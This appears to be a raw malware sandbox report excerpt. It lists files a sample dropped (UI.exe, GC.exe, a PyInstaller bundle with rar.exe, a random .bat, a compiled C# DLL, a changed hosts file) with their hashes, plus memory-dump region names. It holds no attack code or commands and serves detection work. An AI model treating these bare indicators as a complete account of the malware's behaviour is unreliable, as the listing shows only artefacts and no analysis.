memory/2596-101-0x00007FFE11290000-0x00007FFE11D51000-memory.dmp
memory/1832-97-0x00007FFE11293000-0x00007FFE11295000-memory.dmp
memory/1360-96-0x00007FFE18410000-0x00007FFE1843E000-memory.dmp
memory/1360-95-0x00007FFE25B00000-0x00007FFE25B0D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UI.exe
| MD5 | a6d1f2686c50110de2fd76df4dcb7057 |
| SHA1 | 75f47ac32fada1bb9371b45006c2b1744347790a |
| SHA256 | ec6c1cb4a88a3a59dbb1a703445bcad065c65e6422504f9278ef5ce9f2a3b446 |
| SHA512 | f5e796aedbd79463a303906b2f56af054039ae64f1600f0bbb25f57c7cc2805f1108ac4f7f5def5dd195c1e094444f9f04a8e8acc9d7a5277377de511963aa66 |
C:\Users\Admin\AppData\Local\Temp\_MEI13522\libssl-1_1.dll
| MD5 | 8e8a145e122a593af7d6cde06d2bb89f |
| SHA1 | b0e7d78bb78108d407239e9f1b376e0c8c295175 |
| SHA256 | a6a14c1beccbd4128763e78c3ec588f747640297ffb3cc5604a9728e8ef246b1 |
| SHA512 | d104d81aca91c067f2d69fd8cec3f974d23fb5372a8f2752ad64391da3dbf5ffe36e2645a18a9a74b70b25462d73d9ea084318846b7646d39ce1d3e65a1c47c4 |
C:\Users\Admin\AppData\Local\Temp\_MEI13522\libcrypto-1_1.dll
| MD5 | dffcab08f94e627de159e5b27326d2fc |
| SHA1 | ab8954e9ae94ae76067e5a0b1df074bccc7c3b68 |
| SHA256 | 135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15 |
| SHA512 | 57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d |
C:\Users\Admin\AppData\Local\Temp\_MEI13522\unicodedata.pyd
| MD5 | c2556dc74aea61b0bd9bd15e9cd7b0d6 |
| SHA1 | 05eff76e393bfb77958614ff08229b6b770a1750 |
| SHA256 | 987a6d21ce961afeaaa40ba69859d4dd80d20b77c4ca6d2b928305a873d6796d |
| SHA512 | f29841f262934c810dd1062151aefac78cd6a42d959a8b9ac832455c646645c07fd9220866b262de1bc501e1a9570591c0050d5d3607f1683437dea1ff04c32b |
C:\Users\Admin\AppData\Local\Temp\GC.exe
| MD5 | b2bcd053c6452f8a04ba108d850f9781 |
| SHA1 | d69a9b01e46a84347317f93898c270b0df1fd4ca |
| SHA256 | 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec |
| SHA512 | e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe |
memory/472-142-0x0000000005540000-0x0000000005AE4000-memory.dmp
memory/1740-144-0x0000000000D90000-0x00000000010B4000-memory.dmp
memory/472-145-0x0000000004F90000-0x0000000005022000-memory.dmp
memory/1360-139-0x00007FFE0E0F0000-0x00007FFE0E20C000-memory.dmp
memory/472-146-0x0000000005080000-0x000000000508A000-memory.dmp
memory/1832-147-0x00007FFE11290000-0x00007FFE11D51000-memory.dmp
memory/1360-138-0x00007FFE0BF30000-0x00007FFE0C519000-memory.dmp
memory/472-129-0x00000000005B0000-0x0000000000626000-memory.dmp
memory/1360-126-0x00007FFE25B10000-0x00007FFE25B24000-memory.dmp
memory/1360-125-0x00007FFE25BC0000-0x00007FFE25BCD000-memory.dmp
memory/1360-124-0x00007FFE0E210000-0x00007FFE0E588000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI13522\_queue.pyd
| MD5 | decdabaca104520549b0f66c136a9dc1 |
| SHA1 | 423e6f3100013e5a2c97e65e94834b1b18770a87 |
| SHA256 | 9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84 |
| SHA512 | d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88 |
C:\Users\Admin\AppData\Local\Temp\_MEI13522\_hashlib.pyd
| MD5 | f10d896ed25751ead72d8b03e404ea36 |
| SHA1 | eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb |
| SHA256 | 3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3 |
| SHA512 | 7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42 |
memory/1832-117-0x00007FFE11290000-0x00007FFE11D51000-memory.dmp
memory/1360-123-0x00000200152B0000-0x0000020015628000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI13522\_ssl.pyd
| MD5 | 2089768e25606262921e4424a590ff05 |
| SHA1 | bc94a8ff462547ab48c2fbf705673a1552545b76 |
| SHA256 | 3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca |
| SHA512 | 371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86 |
memory/1360-87-0x00007FFE1F380000-0x00007FFE1F399000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e907f77659a6601fcc408274894da2e |
| SHA1 | 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d |
| SHA256 | 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233 |
| SHA512 | 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d3716b82c5009c75652c2c932d402f5d |
| SHA1 | 0e24eac9215e30354c17dc6160f33d388b9ad0d6 |
| SHA256 | b3911ffe77953188bed116540c479628120a2ca207c67b48d201cd1a0f415489 |
| SHA512 | 29955e69b15cece9f0b1cc85b217371d4504abbb4bccd9cf41e52af271be4ce87bc974ae7ee8a86c490c2c68b3159210191a62f423ffead5ecc7f8b6211f5d4e |
memory/4144-179-0x000000001B630000-0x000000001B680000-memory.dmp
memory/4144-180-0x000000001BF80000-0x000000001C032000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mBPJkwhALgfQ.bat
| MD5 | ffcb01d38f00bf7a0a1e7f482ceff4ce |
| SHA1 | 9119dc1fed668acc42e422cadd8c3349bc163112 |
| SHA256 | 7fee3cc6d72b682d7b266f4eb711582fa2cd3928c5908dc733896d22e539c387 |
| SHA512 | e57c89a1a01b67716508c044ac223e1fea898c137489ee34aac782099b7907effdf534538aa6109aeeb819c35b031819cba0ee631a226701b53a390bab9d8274 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | f99e42cdd8b2f9f1a3c062fe9cf6e131 |
| SHA1 | e32bdcab8da0e3cdafb6e3876763cee002ab7307 |
| SHA256 | a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0 |
| SHA512 | c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6 |
\??\c:\Users\Admin\AppData\Local\Temp\voqj5sl0\voqj5sl0.cmdline
| MD5 | 5f63d30d2b863a2a33b672b5207cc252 |
| SHA1 | efab92cfbeae73f9bc11cf4b919081eedbb54973 |
| SHA256 | 2ae706f7954399a28e359e4b81846ed22a727a592049818fb09311b4e14a9b78 |
| SHA512 | d38170a9174e6246ae6feadfbeb88e4130fe1165b378e1a819a3d4b3bb4a19f5d72940b04d3141e8e933e49c09e8889c22f6cf24d2e5e5bbd5d2c13861dd3fcf |
\??\c:\Users\Admin\AppData\Local\Temp\voqj5sl0\voqj5sl0.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
memory/1360-274-0x00007FFE0BF30000-0x00007FFE0C519000-memory.dmp
memory/1360-285-0x00007FFE0E210000-0x00007FFE0E588000-memory.dmp
memory/1360-289-0x00007FFE21A60000-0x00007FFE21A83000-memory.dmp
memory/1360-284-0x00007FFE07010000-0x00007FFE070C8000-memory.dmp
memory/1360-283-0x00007FFE18410000-0x00007FFE1843E000-memory.dmp
memory/1360-281-0x00007FFE1F380000-0x00007FFE1F399000-memory.dmp
memory/1360-280-0x00007FFE070D0000-0x00007FFE07247000-memory.dmp
memory/1360-275-0x00007FFE21A60000-0x00007FFE21A83000-memory.dmp
memory/1360-279-0x00007FFE20CF0000-0x00007FFE20D13000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3bdf0f0bc4de32a6f32ecb8a32ba5df1 |
| SHA1 | 900c6a905984e5e16f3efe01ce2b2cc725fc64f1 |
| SHA256 | c893092af552e973c44e0596d1509605a393896a0c1eae64f11456dc956ba40e |
| SHA512 | 680d8f42fd4cb1fffa52e1f7cc483e8afc79c8f3e25ebfe5324c7c277d88499cc58324313599e307e47ba3ee4004de7554192203413cb061a29170cd9bc889c3 |
\??\c:\Users\Admin\AppData\Local\Temp\voqj5sl0\CSCC4B3F11C9D8E45809981B1A3FF14C8.TMP
| MD5 | ceb491b49909343a179db3d4b096efd4 |
| SHA1 | 39e3afa585381ab0cc38d18cdde1dbdf51eca501 |
| SHA256 | 61bf79a24b4c1a08a24d233cc49dcaa4775bde4efed12a4be392f1d31c69ef92 |
| SHA512 | d330ae1ccd004aa25544b61b8fbaf744086fe83f68edf07438a3f280d0e2eb05aa1d1c63153c133c561ce2a63d2fa714a28894c02e02ceb0145061182476470f |
C:\Users\Admin\AppData\Local\Temp\RES2258.tmp
| MD5 | a0e3bc29dceca06e159758b75b8d704b |
| SHA1 | cb916f271eee200bd16f0621300a9fc92e7f995b |
| SHA256 | 85c9c33b7963141f91c6b1bf8e318abbd9cbafb9004684c55dbe007918a078e5 |
| SHA512 | d6b11b0f33ec43675bce9015379c5d8aa0d14c579ab0024819191609cae0fe2e5a5c57df76a6082ba8d01839f9d2e6d079ad5b4ae7fff043fcf976af9779b111 |
memory/5448-299-0x0000025126B40000-0x0000025126B48000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\voqj5sl0\voqj5sl0.dll
| MD5 | c22f9ff6c6ab03f5eed29278f4625330 |
| SHA1 | 307266a38a870dfaf409e3268af74f67f83a4cbd |
| SHA256 | 4f8ac6675183b14aeb27dce923bd5613140dc2a5cd089361f3300d05b67553e5 |
| SHA512 | 8f3d8b1406196c68079486528ac61a52d6b28d2119ed2cb863f8628b6d9f854b424dbba479002204802dd5653d7483046fcb894e70c3c81dcf66ea60630f3493 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bb8fac255fdf306e35190710c79e3531 |
| SHA1 | 7df46701509f10fc287dde930fa1e2026b51fa02 |
| SHA256 | 598642439b1e50885828bb15b28a415328aaa7fa565a14fa18b16724d8a97abc |
| SHA512 | 3a6e006550dc830ded1040c446b05e522c430c3cb94b64054b1bf30ce7804f578fc5b61611d5e25eb28b0c56293928d51771e80b014c48b229ab5fd2fa5a7575 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 276798eeb29a49dc6e199768bc9c2e71 |
| SHA1 | 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b |
| SHA256 | cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc |
| SHA512 | 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2 |
C:\Users\Admin\AppData\Local\Temp\_MEI13522\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
memory/2524-367-0x00007FF6B5260000-0x00007FF6B8AEE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI13522\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\BackupConvertTo.ico
| MD5 | bfcfae41c6885e20515890197de9cc09 |
| SHA1 | b4131fb610614362905f3b8621331f2037005355 |
| SHA256 | ad81e720053c29da7e620607fcc568bd8d730a8839808b24dc0f28dbdae4e8e2 |
| SHA512 | 7e1a779c27a48c0d3c371851dd624571c49950507cecabfaa92a9055f68301caab16a66802cc2fab037cdace432af819c37b56d26ce43411c01b896fb11b8d40 |
memory/1360-374-0x00007FFE070D0000-0x00007FFE07247000-memory.dmp
memory/2524-406-0x00007FF6B5260000-0x00007FF6B8AEE000-memory.dmp
memory/1360-411-0x00007FFE21A60000-0x00007FFE21A83000-memory.dmp
memory/1360-410-0x00007FFE0BF30000-0x00007FFE0C519000-memory.dmp
memory/1360-425-0x00007FFE0BF30000-0x00007FFE0C519000-memory.dmp
memory/1360-441-0x00007FFE0E210000-0x00007FFE0E588000-memory.dmp
memory/1360-454-0x00000200152B0000-0x0000020015628000-memory.dmp
memory/1360-453-0x00007FFE070D0000-0x00007FFE07247000-memory.dmp
memory/1360-452-0x00007FFE18410000-0x00007FFE1843E000-memory.dmp
memory/1360-451-0x00007FFE25B00000-0x00007FFE25B0D000-memory.dmp
memory/1360-450-0x00007FFE1F380000-0x00007FFE1F399000-memory.dmp
memory/1360-449-0x00007FFE0E0F0000-0x00007FFE0E20C000-memory.dmp
memory/1360-448-0x00007FFE20CF0000-0x00007FFE20D13000-memory.dmp
memory/1360-447-0x00007FFE21320000-0x00007FFE21339000-memory.dmp
memory/1360-446-0x00007FFE20D70000-0x00007FFE20D9D000-memory.dmp
memory/1360-445-0x00007FFE25C30000-0x00007FFE25C3F000-memory.dmp
memory/1360-444-0x00007FFE21A60000-0x00007FFE21A83000-memory.dmp
memory/1360-443-0x00007FFE25BC0000-0x00007FFE25BCD000-memory.dmp
memory/1360-442-0x00007FFE07010000-0x00007FFE070C8000-memory.dmp
memory/1360-440-0x00007FFE25B10000-0x00007FFE25B24000-memory.dmp
memory/2012-456-0x00007FF6EEC70000-0x00007FF6F24FE000-memory.dmp
memory/4892-478-0x00000211B7DB0000-0x00000211B7DCC000-memory.dmp
memory/4892-479-0x00000211B7DD0000-0x00000211B7E85000-memory.dmp
memory/4892-480-0x00000211B7E90000-0x00000211B7E9A000-memory.dmp
memory/4892-481-0x00000211B8000000-0x00000211B801C000-memory.dmp
memory/4892-482-0x00000211B7FE0000-0x00000211B7FEA000-memory.dmp
memory/4892-483-0x00000211B8040000-0x00000211B805A000-memory.dmp
memory/4892-484-0x00000211B7FF0000-0x00000211B7FF8000-memory.dmp
memory/4892-485-0x00000211B8020000-0x00000211B8026000-memory.dmp
memory/4892-486-0x00000211B8030000-0x00000211B803A000-memory.dmp
memory/1480-507-0x00000250F2FC0000-0x00000250F3075000-memory.dmp
memory/4548-513-0x000001B73EA50000-0x000001B73EA70000-memory.dmp
memory/2012-512-0x00007FF6EEC70000-0x00007FF6F24FE000-memory.dmp
memory/6084-517-0x00007FF631A80000-0x00007FF631AAA000-memory.dmp
memory/4548-518-0x00007FF70C770000-0x00007FF70CF5F000-memory.dmp
memory/4548-523-0x00007FF70C770000-0x00007FF70CF5F000-memory.dmp
memory/6084-527-0x00007FF631A80000-0x00007FF631AAA000-memory.dmp
memory/4548-528-0x00007FF70C770000-0x00007FF70CF5F000-memory.dmp
memory/4548-530-0x00007FF70C770000-0x00007FF70CF5F000-memory.dmp
memory/4548-535-0x00007FF70C770000-0x00007FF70CF5F000-memory.dmp
memory/4548-540-0x00007FF70C770000-0x00007FF70CF5F000-memory.dmp
memory/4548-545-0x00007FF70C770000-0x00007FF70CF5F000-memory.dmp